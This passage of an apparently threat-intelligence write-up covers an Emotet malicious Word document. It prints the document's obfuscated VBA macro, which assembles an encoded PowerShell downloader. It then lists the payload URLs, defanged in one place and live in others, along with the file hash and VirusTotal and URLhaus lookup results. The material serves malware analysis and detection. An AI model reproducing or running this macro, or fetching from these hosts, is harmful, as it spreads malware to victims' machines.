bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9\r\n \r\n Qfyk87zgdp86ufle = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n End Function\r\n\r\n Function Zk46e7c8d40(G7b_e54iwh7id_)\r\n On Error Resume Next\r\n X8e38jclqayh83g3a6 = CleanString("powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9)\r\n Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")\r\n B4ru9eb_hhowd = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n Zk46e7c8d40 = B4ru9eb_hhowd\r\n End Function\r\n<\/pre>\n
\n==========<\/p>\n
\n—–
\nhxxp:\/\/haymetetrading[.]com\/wp-includes\/yGELKj4\/
\nhxxp:\/\/simofferbd24[.]com\/wp-includes\/fsiQc\/
\nhxxp:\/\/401kplansinfo[.]com\/cgi-bin\/KtFRk\/
\nhxxp:\/\/fidelityguide[.]com\/cgi-bin\/VA\/
\nhxxps:\/\/sirnakmidyeci[.]com\/wp-includes\/qk9wW2\/
\nhxxps:\/\/subitocarne[.]com\/wp-content\/ByeOAt9\/
\nhxxps:\/\/eliesalibaarchitect[.]com\/wordpress\/T\/<\/p>\n
\n——–
\nhttp:\/\/twitter.com\/Cryptolaemus1\/status\/1308071468815847426<\/a>
\nhttp:\/\/pastebin.com\/UYbUAeuS<\/a> – Emotet Epoch 2 IOCs as of 2020-09-21 15:05 US\/Eastern
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fhaymetetrading.com%2Fwp-includes%2FyGELKj4%2F+<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fsimofferbd24.com%2Fwp-includes%2FfsiQc%2F<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2F401kplansinfo.com%2Fcgi-bin%2FKtFRk%2F+<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Ffidelityguide.com%2Fcgi-bin%2FVA%2F<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsirnakmidyeci.com%2Fwp-includes%2Fqk9wW2%2F+<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsubitocarne.com%2Fwp-content%2FByeOAt9%2F<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Feliesalibaarchitect.com%2Fwordpress%2FT%2F<\/a><\/p>\n
\n————–
\n515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 — LRE-090120 JYW-092120.doc<\/p>\n
\n———-
\nmachinae 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 http:\/\/haymetetrading.com\/wp-includes\/yGELKj4\/ http:\/\/simofferbd24.com\/wp-includes\/fsiQc\/ http:\/\/401kplansinfo.com\/cgi-bin\/KtFRk\/ http:\/\/fidelityguide.com\/cgi-bin\/VA\/ http:\/\/sirnakmidyeci.com\/wp-includes\/qk9wW2\/ http:\/\/subitocarne.com\/wp-content\/ByeOAt9\/ http:\/\/eliesalibaarchitect.com\/wordpress\/T\/<\/p>\n
\n* Information for 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[+] VirusTotal File Report Results
\n [-] Date submitted: 2020-09-22 16:56:49
\n [-] Detected engines: 35
\n [-] Total engines: 59
\n [-] Scans: (‘Elastic’, ‘malicious (high confidence)’)
\n [-] Scans: (‘ClamAV’, ‘Doc[.]Downloader[.]Generic-9764611-0’)
\n [-] Scans: (‘CAT-QuickHeal’, ‘OLE[.]Emotet.39167’)
\n [-] Scans: (‘McAfee’, ‘W97M\/Downloader[.]dbv’)
\n [-] Scans: (‘K7AntiVirus’, ‘Trojan ( 0056edf51 )’)
\n [-] Scans: (‘K7GW’, ‘Trojan ( 0056edf51 )’)
\n [-] Scans: (‘TrendMicro’, ‘Trojan.W97M[.]EMOTET[.]TIOIBELH’)
\n [-] Scans: (‘Cyren’, ‘W97M\/Agent.A’)
\n [-] Scans: (‘Symantec’, ‘W97M[.]Downloader’)
\n [-] Scans: (‘ESET-NOD32’, ‘VBA\/TrojanDownloader[.]Agent[.]UFY’)
\n [-] Scans: (‘TrendMicro-HouseCall’, ‘Trojan.W97M[.]EMOTET[.]TIOIBELH’)
\n [-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]SAgent[.]gen’)
\n [-] Scans: (‘BitDefender’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘MicroWorld-eScan’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘Tencent’, ‘Heur[.]Macro[.]Generic.h.9fc6359d’)
\n [-] Scans: (‘Ad-Aware’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘Sophos’, ‘Mal\/DocDl-K’)
\n [-] Scans: (‘F-Secure’, ‘Malware[.]VBA\/Dldr.Agent[.]boxrg’)
\n [-] Scans: (‘Invincea’, ‘Mal\/DocDl-K’)
\n [-] Scans: (‘McAfee-GW-Edition’, ‘W97M\/Downloader[.]dbv’)
\n [-] Scans: (‘FireEye’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘Emsisoft’, ‘VB:Trojan.VBA[.]Agent[.]BHR (B)’)
\n [-] Scans: (‘Avira’, ‘VBA\/Dldr[.]Agent[.]boxrg’)
\n [-] Scans: (‘Microsoft’, ‘TrojanDownloader:O97M\/Emotet[.]PEE!MTB’)
\n [-] Scans: (‘Arcabit’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘AegisLab’, ‘Trojan[.]MSWord[.]Generic.4!c’)
\n [-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan.MSOffice[.]SAgent[.]gen’)
\n [-] Scans: (‘GData’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
\n [-] Scans: (‘AhnLab-V3’, ‘Downloader\/MSOffice[.]Generic’)
\n [-] Scans: (‘TACHYON’, ‘Suspicious\/W97M[.]Obfus[.]Gen.5’)
\n [-] Scans: (‘Zoner’, ‘Probably Heur.W97Obfuscated’)
\n [-] Scans: (‘Rising’, ‘Malware[.]ObfusVBA@ML.89 (VBA)’)
\n [-] Scans: (‘Ikarus’, ‘Trojan-Downloader[.]VBA[.]Emotet’)
\n [-] Scans: (‘Fortinet’, ‘VBA\/Agent[.]DBV!tr[.]dldr’)
\n [-] Scans: (‘Qihoo-360’, ‘virus[.]office[.]qexvmc.1095’)<\/p>\n
\n* Information for http:\/\/haymetetrading.com\/wp-includes\/yGELKj4\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal URL Report Results
\n [-] Date submitted: 2020-09-22 16:00:16
\n [-] Detected scanners: 13
\n [-] Total scanners: 79
\n [-] URL Scanner: (‘Kaspersky’, ‘malware site’)
\n [-] URL Scanner: (‘G-Data’, ‘malware site’)
\n [-] URL Scanner: (‘CyRadar’, ‘malicious site’)
\n [-] URL Scanner: (‘Dr[.]Web’, ‘malicious site’)
\n [-] URL Scanner: (‘Spamhaus’, ‘malware site’)
\n [-] URL Scanner: (‘Avira’, ‘malware site’)
\n [-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
\n [-] URL Scanner: (‘URLhaus’, ‘malicious site’)
\n [-] URL Scanner: (‘ESET’, ‘malware site’)
\n [-] URL Scanner: (‘Sophos’, ‘malware site’)
\n [-] URL Scanner: (‘Netcraft’, ‘malicious site’)
\n [-] URL Scanner: (‘CRDF’, ‘malicious site’)
\n [-] URL Scanner: (‘Fortinet’, ‘malware site’)<\/p>\n
\n* Information for http:\/\/simofferbd24.com\/wp-includes\/fsiQc\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal URL Report Results
\n [-] Date submitted: 2020-09-22 02:19:27
\n [-] Detected scanners: 12
\n [-] Total scanners: 79
\n [-] URL Scanner: (‘Kaspersky’, ‘malware site’)
\n [-] URL Scanner: (‘CyRadar’, ‘malicious site’)
\n [-] URL Scanner: (‘AlienVault’, ‘malicious site’)
\n [-] URL Scanner: (‘Spamhaus’, ‘malware site’)
\n [-] URL Scanner: (‘Avira’, ‘malware site’)
\n [-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
\n [-] URL Scanner: (‘URLhaus’, ‘malicious site’)
\n [-] URL Scanner: (‘ESET’, ‘malware site’)
\n [-] URL Scanner: (‘Sophos’, ‘malware site’)
\n [-] URL Scanner: (‘Netcraft’, ‘malicious site’)
\n [-] URL Scanner: (‘CRDF’, ‘malicious site’)
\n [-] URL Scanner: (‘Fortinet’, ‘malware site’)<\/p>\n
\n* Information for http:\/\/401kplansinfo.com\/cgi-bin\/KtFRk\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal URL Report Results
\n [-] Date submitted: 2020-09-21 16:42:18
\n [-] Detected scanners: 3
\n [-] Total scanners: 79
\n [-] URL Scanner: (‘G-Data’, ‘malware site’)
\n [-] URL Scanner: (‘Spamhaus’, ‘malware site’)
\n [-] URL Scanner: (‘Fortinet’, ‘malware site’)<\/p>\n
\n* Information for http:\/\/fidelityguide.com\/cgi-bin\/VA\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites<\/p>\n
\n* Information for http:\/\/sirnakmidyeci.com\/wp-includes\/qk9wW2\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites<\/p>\n
\n* Information for http:\/\/subitocarne.com\/wp-content\/ByeOAt9\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal URL Report Results
\n [-] Date submitted: 2020-09-21 18:24:28
\n [-] Detected scanners: 8
\n [-] Total scanners: 79
\n [-] URL Scanner: (‘Kaspersky’, ‘malware site’)
\n [-] URL Scanner: (‘Spamhaus’, ‘malware site’)
\n [-] URL Scanner: (‘Avira’, ‘malware site’)
\n [-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
\n [-] URL Scanner: (‘URLhaus’, ‘malicious site’)
\n [-] URL Scanner: (‘ESET’, ‘malware site’)
\n [-] URL Scanner: (‘Netcraft’, ‘malicious site’)
\n [-] URL Scanner: (‘Fortinet’, ‘malware site’)<\/p>\n
